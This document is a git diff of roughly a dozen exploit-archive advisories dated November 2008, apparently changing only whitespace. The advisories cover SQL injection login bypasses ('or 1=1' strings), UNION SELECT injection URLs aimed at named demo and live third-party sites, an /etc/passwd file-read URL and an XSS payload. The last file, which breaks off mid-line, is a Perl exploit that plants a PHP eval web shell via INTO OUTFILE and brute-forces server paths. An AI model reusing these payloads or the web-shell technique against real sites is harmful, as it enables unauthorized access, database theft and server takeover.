[2008-11-07] diff --git a/platforms/php/webapps/7041.txt b/platforms/php/webapps/7041.txt index ab2e25029..320e9f508 100755 --- a/platforms/php/webapps/7041.txt +++ b/platforms/php/webapps/7041.txt 
@@ -1,29 +1,29 @@
-E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vulnerability
-
-author: ZoRLu msn: trt-turk@hotmail.com
-
-Home: www.z0rlu.blogspot.com
-
-N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( bIktIm a.q )
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1
-
-password: ZoRLu
-
-note: generally admin name: admin
-
-
-for demo:
-
-http://e-topbiz.com/trafficdemos/store1/admin/login.php
-
-username: admin ' or ' 1=1--
-
-password: ZoRLu
-
-
-thanks: str0ke & yildirimordulari.org & darkc0de.com
-
-# milw0rm.com [2008-11-07]
+E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vulnerability
+
+author: ZoRLu msn: trt-turk@hotmail.com
+
+Home: www.z0rlu.blogspot.com
+
+N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( bIktIm a.q )
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1
+
+password: ZoRLu
+
+note: generally admin name: admin
+
+
+for demo:
+
+http://e-topbiz.com/trafficdemos/store1/admin/login.php
+
+username: admin ' or ' 1=1--
+
+password: ZoRLu
+
+
+thanks: str0ke & yildirimordulari.org & darkc0de.com
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7042.txt b/platforms/php/webapps/7042.txt
index 4e4613613..6bbd41861 100755
--- a/platforms/php/webapps/7042.txt
+++ b/platforms/php/webapps/7042.txt
@@ -1,57 +1,57 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -#- Nik-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # -# and all darkc0de and DarkTrix members --# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com & darktrix.info -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: Pre Car Lister (Auth Bypass) SQl Injection Vulnerability -# -# -########################################################### -# -# Script Vendor: http://www.preproject.com/projectDetail.asp?projectID=226 -# -########################################################### - - Go To Admin Panel : - - Login With this information : - - Admin : anything' OR 'x'='x - - pass : anything' OR 'x'='x - - - Live Demo : - - http://www.preproject.com/abc/carlister/adminlogin.php - - -########################################################### -# -# Bug discovered : 06 Nov 2008 -########################################################### - -# milw0rm.com [2008-11-07] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ 
______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +#- Nik-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # +# and all darkc0de and DarkTrix members --# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com & darktrix.info +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: Pre Car Lister (Auth Bypass) SQl Injection Vulnerability +# +# +########################################################### +# +# Script Vendor: http://www.preproject.com/projectDetail.asp?projectID=226 +# +########################################################### + + Go To Admin Panel : + + Login With this information : + + Admin : anything' OR 'x'='x + + pass : anything' OR 'x'='x + + + Live Demo : + + http://www.preproject.com/abc/carlister/adminlogin.php + + +########################################################### +# +# Bug discovered : 06 Nov 2008 +########################################################### + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7043.txt b/platforms/php/webapps/7043.txt index ad55039f7..989095567 100755 --- a/platforms/php/webapps/7043.txt +++ b/platforms/php/webapps/7043.txt 
@@ -1,67 +1,67 @@ -*********************************************************************************************************************************************************** -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!] O O O O O [!] -[!] O O O [!] -[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!] O OOO OOO O O O O OO O O O O OO O O O [!] -[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!] O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO [!] -*********************************************************************************************************************************************************** - +---- Bismi Allah Irahmani ArraHim ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [ Mole Group Rental Script(Auth Bypass) SQL Injection Vulnerability ] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: Author : Cyber-Zone ( Abdelkhalek) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ -¦ From : MoroCCo ¦ ¦ ¦ -¦ Script : http://www.mole-group.com ¦ ¦ ![ ]! ¦ -¦ Download : http://www.mole-group.com/content/view/32/46/ ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. 
¦ -¦ ¦ - -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ - - -Bypass : ........ - -Go To The Admin Panel. -and Login with this information : - -username : admin ' or ' 1=1 -password : Cyber-Zone or any thing you want :) - -yeah bro you loged in dont worry :) - -and this is a live demo : -http://rent.mole-group.com/admin/login.php?in_login=yes&retpage=%2Fadmin%2Findex.php - -EnjoY. - - - -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -+---- ThanX To ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -= [AttaCk Is CompLet] = -___________________________________________________________________________________________________________________________________________________________ - -# milw0rm.com [2008-11-07] +*********************************************************************************************************************************************************** +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!] O O O O O [!] +[!] O O O [!] +[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!] O OOO OOO O O O O OO O O O O OO O O O [!] +[!] 
O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!] O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO [!] +*********************************************************************************************************************************************************** + +---- Bismi Allah Irahmani ArraHim ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [ Mole Group Rental Script(Auth Bypass) SQL Injection Vulnerability ] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: Author : Cyber-Zone ( Abdelkhalek) : : : +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ From : MoroCCo ¦ ¦ ¦ +¦ Script : http://www.mole-group.com ¦ ¦ ![ ]! ¦ +¦ Download : http://www.mole-group.com/content/view/32/46/ ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: : +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ + +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] 
++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ + + +Bypass : ........ + +Go To The Admin Panel. +and Login with this information : + +username : admin ' or ' 1=1 +password : Cyber-Zone or any thing you want :) + +yeah bro you loged in dont worry :) + +and this is a live demo : +http://rent.mole-group.com/admin/login.php?in_login=yes&retpage=%2Fadmin%2Findex.php + +EnjoY. + + + ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ ++---- ThanX To ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ += [AttaCk Is CompLet] = +___________________________________________________________________________________________________________________________________________________________ + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7044.txt b/platforms/php/webapps/7044.txt index ddc42fd0b..09014a609 100755 --- a/platforms/php/webapps/7044.txt +++ b/platforms/php/webapps/7044.txt 
@@ -1,45 +1,45 @@ -[~] MyioSoft Ajax Portal 3.0 Remote Auth Bypass Vulnerability -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 07.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] dork: "Powered by Ajax Portal 3.0" -[~] -[~] ----------------------------------------------------------- - -Exploit: - -username: [real_admin_name] ' or ' 1=1 ( you must know admin_name ) - -password: ZoRLu - -note: generally admin name: admin - - -admin login for demo: - -http://myiosoft.com/products/AjaxPortal/demo/ - - -example for demo: - -admin: demo1 ' or ' 1=1 - -passwd: ZoRLu - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-07] +[~] MyioSoft Ajax Portal 3.0 Remote Auth Bypass Vulnerability +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 07.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] dork: "Powered by Ajax Portal 3.0" +[~] +[~] ----------------------------------------------------------- + +Exploit: + +username: [real_admin_name] ' or ' 1=1 ( you must know admin_name ) + +password: ZoRLu + +note: generally admin name: admin + + +admin login for demo: + +http://myiosoft.com/products/AjaxPortal/demo/ + + +example for demo: + +admin: demo1 ' or ' 1=1 + +passwd: ZoRLu + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# 
milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7045.txt b/platforms/php/webapps/7045.txt
index 249ef39fd..31b3842df 100755
--- a/platforms/php/webapps/7045.txt
+++ b/platforms/php/webapps/7045.txt
@@ -1,43 +1,43 @@ -[~] MyioSoft EasyBookMarker Remote Auth Bypass Vulnerability -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 07.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] ----------------------------------------------------------- - -Exploit: - -username: [real_admin_name] ' or ' 1=1 ( you must know admin_name ) - -password: ZoRLu - -note: generally admin name: admin - - -admin login for demo: - -http://myiosoft.com/products/EasyBookMarker/demo/ - - -example for demo: - -admin: demo1 ' or ' 1=1 - -passwd: ZoRLu - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-07] +[~] MyioSoft EasyBookMarker Remote Auth Bypass Vulnerability +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 07.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] ----------------------------------------------------------- + +Exploit: + +username: [real_admin_name] ' or ' 1=1 ( you must know admin_name ) + +password: ZoRLu + +note: generally admin name: admin + + +admin login for demo: + +http://myiosoft.com/products/EasyBookMarker/demo/ + + +example for demo: + +admin: demo1 ' or ' 1=1 + +passwd: ZoRLu + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-07] 
diff --git a/platforms/php/webapps/7046.txt b/platforms/php/webapps/7046.txt
index 6edffe069..c5957034f 100755
--- a/platforms/php/webapps/7046.txt
+++ b/platforms/php/webapps/7046.txt
@@ -1,43 +1,43 @@ -[~] MyioSoft EasyCalendar Remote Auth Bypass Vulnerability -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 07.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] ----------------------------------------------------------- - -Exploit: - -username: [real_admin_name] ' or ' 1=1 ( you must know admin_name ) - -password: ZoRLu - -note: generally admin name: admin - - -admin login for demo: - -http://myiosoft.com/products/EasyCalendar/demo/ - - -example for demo: - -admin: demo1 ' or ' 1=1 - -passwd: ZoRLu - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-07] +[~] MyioSoft EasyCalendar Remote Auth Bypass Vulnerability +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 07.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] ----------------------------------------------------------- + +Exploit: + +username: [real_admin_name] ' or ' 1=1 ( you must know admin_name ) + +password: ZoRLu + +note: generally admin name: admin + + +admin login for demo: + +http://myiosoft.com/products/EasyCalendar/demo/ + + +example for demo: + +admin: demo1 ' or ' 1=1 + +passwd: ZoRLu + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-07] 
diff --git a/platforms/php/webapps/7047.txt b/platforms/php/webapps/7047.txt
index b848067c5..c26138950 100755
--- a/platforms/php/webapps/7047.txt
+++ b/platforms/php/webapps/7047.txt
@@ -1,41 +1,41 @@ -[~] deltascripts phpclassifieds Remote Sql inj. -[~] -[~] detail.php (siteid) -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 06.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] ----------------------------------------------------------- - -Exploit: - -http://localhost/script_path/detail.php?siteid=[SQL] - -[SQL]= - --99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/* - -live sites: - -http://www.deltascripts.com/phpclassifieds/livesites - -for example: - -http://www.saabcentral.com/classifieds/detail.php?siteid=-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/* - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-07] +[~] deltascripts phpclassifieds Remote Sql inj. 
+[~] +[~] detail.php (siteid) +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 06.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] ----------------------------------------------------------- + +Exploit: + +http://localhost/script_path/detail.php?siteid=[SQL] + +[SQL]= + +-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/* + +live sites: + +http://www.deltascripts.com/phpclassifieds/livesites + +for example: + +http://www.saabcentral.com/classifieds/detail.php?siteid=-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/* + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7048.txt b/platforms/php/webapps/7048.txt index d8a83461f..ca58da451 100755 --- a/platforms/php/webapps/7048.txt +++ b/platforms/php/webapps/7048.txt 
@@ -1,14 +1,14 @@ -> > ================================================================= -> > ======== E-topbiz Online Store 1 Remote File Sql Injection ====== -> > ================================================================= -> > home of script : http://e-topbiz.com/ -> > By: Stack -> > ====Vulnerable Demo and Exploit ==== -> > -> > PoC URL : -> > http://site.il/path/index.php?cat_id=-1%20unION/**/SELECT/**/concat_ws(0x3a,user(),database()),2,3,4,5,6/* -> > -> > Demo URL : -> > http://e-topbiz.com/trafficdemos/store1/index.php?cat_id=-1%20unION/**/SELECT/**/concat_ws(0x3a,user(),database()),2,3,4,5,6/* - -# milw0rm.com [2008-11-07] +> > ================================================================= +> > ======== E-topbiz Online Store 1 Remote File Sql Injection ====== +> > ================================================================= +> > home of script : http://e-topbiz.com/ +> > By: Stack +> > ====Vulnerable Demo and Exploit ==== +> > +> > PoC URL : +> > http://site.il/path/index.php?cat_id=-1%20unION/**/SELECT/**/concat_ws(0x3a,user(),database()),2,3,4,5,6/* +> > +> > Demo URL : +> > http://e-topbiz.com/trafficdemos/store1/index.php?cat_id=-1%20unION/**/SELECT/**/concat_ws(0x3a,user(),database()),2,3,4,5,6/* + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7049.txt b/platforms/php/webapps/7049.txt index 77a73ec2f..4e08189e9 100755 --- a/platforms/php/webapps/7049.txt +++ b/platforms/php/webapps/7049.txt 
@@ -1,33 +1,33 @@ -************************(XSS / FD Vulnerability)************** - -script:Mini Web Calendar, ver. 1.2 - - -************************************************************************************************************ -download from:http://www.smolinari.com/srm/download/mwcal/mwcal.zip?PHPSESSID=84ivc1h7ohn8f9ra7cgn66fj94 - -************************************************************************************************************ - - -...................................................................................... -local file xpl: - -http://www.site.com/mwcal/php/cal_pdf.php?thefile=/etc/passwd - -xss xpl: - -http://www.site.com/mwcal/php/cal_default.php/>'> - - - -*************************************************** -*************************************************** - -Author: ahmadbady from http://www.deltahacking.net - -my mail: kivi_hacker666@yahoo.com - - -*************************************************** - -# milw0rm.com [2008-11-07] +************************(XSS / FD Vulnerability)************** + +script:Mini Web Calendar, ver. 1.2 + + +************************************************************************************************************ +download from:http://www.smolinari.com/srm/download/mwcal/mwcal.zip?PHPSESSID=84ivc1h7ohn8f9ra7cgn66fj94 + +************************************************************************************************************ + + +...................................................................................... +local file xpl: + +http://www.site.com/mwcal/php/cal_pdf.php?thefile=/etc/passwd + +xss xpl: + +http://www.site.com/mwcal/php/cal_default.php/>'> + + + +*************************************************** +*************************************************** + +Author: ahmadbady from http://www.deltahacking.net + +my mail: kivi_hacker666@yahoo.com + + +*************************************************** + +# milw0rm.com [2008-11-07] 
diff --git a/platforms/php/webapps/7050.txt b/platforms/php/webapps/7050.txt
index 4d4ed6c08..143474e22 100755
--- a/platforms/php/webapps/7050.txt
+++ b/platforms/php/webapps/7050.txt
@@ -1,40 +1,40 @@ -e-topbiz Number Links 1 php ( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -MaiL : darkangeL_G85@Yahoo.CoM -___________________________________ - -script : http://e-topbiz.com/oprema/pages/numberlinks1.php - -_____ - -ExploiT & Demo -______________ - -http://e-topbiz.com/trafficdemos/numberlinks1/admin/admin_catalog.php?action=edit&id=-2+union+select+concat(user - -(),0x3e,version()),2,3,4,5-- - - - - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| -|_____________________________________________________________________ - - - Im IRAQi | Im TrYaGi - -# milw0rm.com [2008-11-07] +e-topbiz Number Links 1 php ( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +MaiL : darkangeL_G85@Yahoo.CoM +___________________________________ + +script : http://e-topbiz.com/oprema/pages/numberlinks1.php + +_____ + +ExploiT & Demo +______________ + +http://e-topbiz.com/trafficdemos/numberlinks1/admin/admin_catalog.php?action=edit&id=-2+union+select+concat(user + +(),0x3e,version()),2,3,4,5-- + + + + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| +|_____________________________________________________________________ + + + Im IRAQi | Im TrYaGi + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7052.txt b/platforms/php/webapps/7052.txt index 8c25209b2..e7de5efb7 100755 
--- a/platforms/php/webapps/7052.txt +++ b/platforms/php/webapps/7052.txt @@ -1,35 +1,35 @@ -#################WwW.StarHack.Us##################### -# -# Author : TR-ShaRk -# -###################### -# -# Web : StarHack.Us OldKral.Com -# -###################### -# -# Email : Admin@tr-shark.org -# Msn : Starhack@tr-shark.org -# -###################### -# -# Script : Domain Seller Pro� v1.5 -# -###################### -# -# SQL Injection Vuln. : -# -# index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- -# -###################### -# -# Demo : - -http://www.domainsellerpro.com/demo/index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- -# -# -# -#################WwW.StarHack.Us######################## -Greetz: FataliSt,Webloader,JaCKaL,By-Reis,AranelWorM,RealWolker,DesTRoyeR - -# milw0rm.com [2008-11-07] +#################WwW.StarHack.Us##################### +# +# Author : TR-ShaRk +# +###################### +# +# Web : StarHack.Us OldKral.Com +# +###################### +# +# Email : Admin@tr-shark.org +# Msn : Starhack@tr-shark.org +# +###################### +# +# Script : Domain Seller Pro� v1.5 +# +###################### +# +# SQL Injection Vuln. : +# +# index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- +# +###################### +# +# Demo : + +http://www.domainsellerpro.com/demo/index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- +# +# +# +#################WwW.StarHack.Us######################## +Greetz: FataliSt,Webloader,JaCKaL,By-Reis,AranelWorM,RealWolker,DesTRoyeR + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7057.pl b/platforms/php/webapps/7057.pl index a03bff82c..ca8bc7816 100755 --- a/platforms/php/webapps/7057.pl +++ b/platforms/php/webapps/7057.pl 
@@ -1,150 +1,150 @@ -#!/usr/bin/perl - -=about - - MemHT Portal <= 4.0 Perl exploit - - AUTHOR: - Discovered and written by Ams - ax330d [doggy] gmail [dot] com - - DESCRIPTION: - Here we are able to make SQL-injection due to weak filtering. - So, look at inc/inc_header.php lines ~ 74, where hides code - $checktitle = (isset($_GET['title'])) ? urldecode(inCode($_GET['title'])) : "" ; - We can easily bypass this check. And look again at lines - ~ 67 in inc/inc_fnctions.php, - this is not that best solution. - - This exploit provides simple shell. - - REQUIREMENTS: - MySQL should be able to write to file - Know full server path to portal - -=cut - -use strict; -use warnings; -use IO::Socket; - -print " - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - MemHT portal <= 4.0 Perl exploit - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - "; - -my $expl_url = shift or &usage; -my $serv_path = shift || '-b'; -my $def_shell = '/uploads/file/files.php'; -# Simple concept shell -my $shell = '%253C%253Fphp%2520@eval%2528%2524_GET%255Bcmd%255D%2529%253B'; - -my @paths = qw( - /var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts - /home/www /home/httpd/vhosts - /usr/local/apache/htdocs - /www/htdocs -); - -@paths = ( $serv_path ) unless $serv_path eq '-b'; - -exploit( $expl_url ); - -sub exploit { - - # Defining vars. 
- $_ = shift; - $_ .= '/' unless substr($_, -1) eq '/'; - print "\n\tExploiting:\t $_\n"; - - my($packet, $rcvd); - my($prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?}; - - # Trying to get /lang/english.php to get server path - $packet = "POST $path/lang/english.php HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: Close\r\n"; - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; - $rcvd = send_pckt($host, $packet, 1); - - die "\n\tUnable to connect to $host!\n\n" unless $rcvd; - - if( $rcvd =~ /Undefined variable:/ ) { - @paths = ($rcvd =~ m#\s+in\s+(.*?)${path}lang/english.php#); - print "\n\tFound path:\t $paths[-1]\n"; - } else { - print "\n\tStarting bruteforce...\n"; - } - - # Some bruteforce here - for $serv_path ( @paths ) { - - # Poisoned request - my $injection - = "page=articles&id=-1&op=readArticle&title=one%2527%2520UNION+SELECT+1%2C2%2C%2527$shell%2527+INTO+OUTFILE+%2527$serv_path$path$def_shell%2527--\%2520"; - - print "\n\tTesting:\t $serv_path$path$def_shell ...\n"; - $packet = "GET $path/index.php?$injection HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: Close\r\n"; - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; - - send_pckt($host, $packet, 1) or die "\n\tUnable to connect to http://$host!\n\n"; - } - - # Checking for shell presence - $packet = 